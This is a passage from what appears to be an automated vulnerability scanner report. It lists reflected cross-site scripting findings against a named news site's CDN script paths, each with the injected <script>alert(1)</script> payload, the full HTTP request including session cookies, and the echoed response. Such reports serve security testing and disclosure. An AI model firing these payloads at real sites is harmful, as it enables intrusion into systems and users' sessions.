Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:15 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts7ffbb<script>alert(1)</script>ca4259161be/jquery-ui-tabs.js</p>
...[SNIP]...

1.85. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 383ce<script>alert(1)</script>fd5a2a75630 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js383ce<script>alert(1)</script>fd5a2a75630 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js383ce<script>alert(1)</script>fd5a2a75630</p>
...[SNIP]...

1.86. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 67680<script>alert(1)</script>80cf6ac3e1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig67680<script>alert(1)</script>80cf6ac3e1e/WebPortal/nypost/scripts/jquery.dimensions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:50 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig67680<script>alert(1)</script>80cf6ac3e1e/WebPortal/nypost/scripts/jquery.dimensions.js</p>
...[SNIP]...

1.87. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 574d4<script>alert(1)</script>a473b6a72f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal574d4<script>alert(1)</script>a473b6a72f1/nypost/scripts/jquery.dimensions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal574d4<script>alert(1)</script>a473b6a72f1/nypost/scripts/jquery.dimensions.js</p>
...[SNIP]...

1.88. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8643b<script>alert(1)</script>e0b51e81287 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost8643b<script>alert(1)</script>e0b51e81287/scripts/jquery.dimensions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:06 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost8643b<script>alert(1)</script>e0b51e81287/scripts/jquery.dimensions.js</p>
...[SNIP]...

1.89. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8ba5a<script>alert(1)</script>8305c520f94 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts8ba5a<script>alert(1)</script>8305c520f94/jquery.dimensions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts8ba5a<script>alert(1)</script>8305c520f94/jquery.dimensions.js</p>
...[SNIP]...

1.90. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 21864<script>alert(1)</script>2f7cd94a064 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js21864<script>alert(1)</script>2f7cd94a064 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js21864<script>alert(1)</script>2f7cd94a064</p>
...[SNIP]...

1.91. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 220e9<script>alert(1)</script>1359c02d889 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig220e9<script>alert(1)</script>1359c02d889/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig220e9<script>alert(1)</script>1359c02d889/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js</p>
...[SNIP]...

1.92. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37c80<script>alert(1)</script>4d7a62988b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal37c80<script>alert(1)</script>4d7a62988b0/nypost/scripts/jquery.jcarousel.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:04 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal37c80<script>alert(1)</script>4d7a62988b0/nypost/scripts/jquery.jcarousel.nyp.js</p>
...[SNIP]...

1.93. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload abbe6<script>alert(1)</script>7f61ed691f7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostabbe6<script>alert(1)</script>7f61ed691f7/scripts/jquery.jcarousel.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:12 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostabbe6<script>alert(1)</script>7f61ed691f7/scripts/jquery.jcarousel.nyp.js</p>
...[SNIP]...

1.94. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b7a5b<script>alert(1)</script>6f8e96b8ffa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scriptsb7a5b<script>alert(1)</script>6f8e96b8ffa/jquery.jcarousel.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scriptsb7a5b<script>alert(1)</script>6f8e96b8ffa/jquery.jcarousel.nyp.js</p>
...[SNIP]...

1.95. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 232ec<script>alert(1)</script>c3188075af6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js232ec<script>alert(1)</script>c3188075af6 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:27 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js232ec<script>alert(1)</script>c3188075af6</p>
...[SNIP]...

1.96. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1efa9<script>alert(1)</script>92506e40b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig1efa9<script>alert(1)</script>92506e40b7a/WebPortal/nypost/scripts/jquery.liscroll.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:48 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig1efa9<script>alert(1)</script>92506e40b7a/WebPortal/nypost/scripts/jquery.liscroll.nyp.js</p>
...[SNIP]...

1.97. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 94a89<script>alert(1)</script>34c114d8f35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal94a89<script>alert(1)</script>34c114d8f35/nypost/scripts/jquery.liscroll.nyp.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
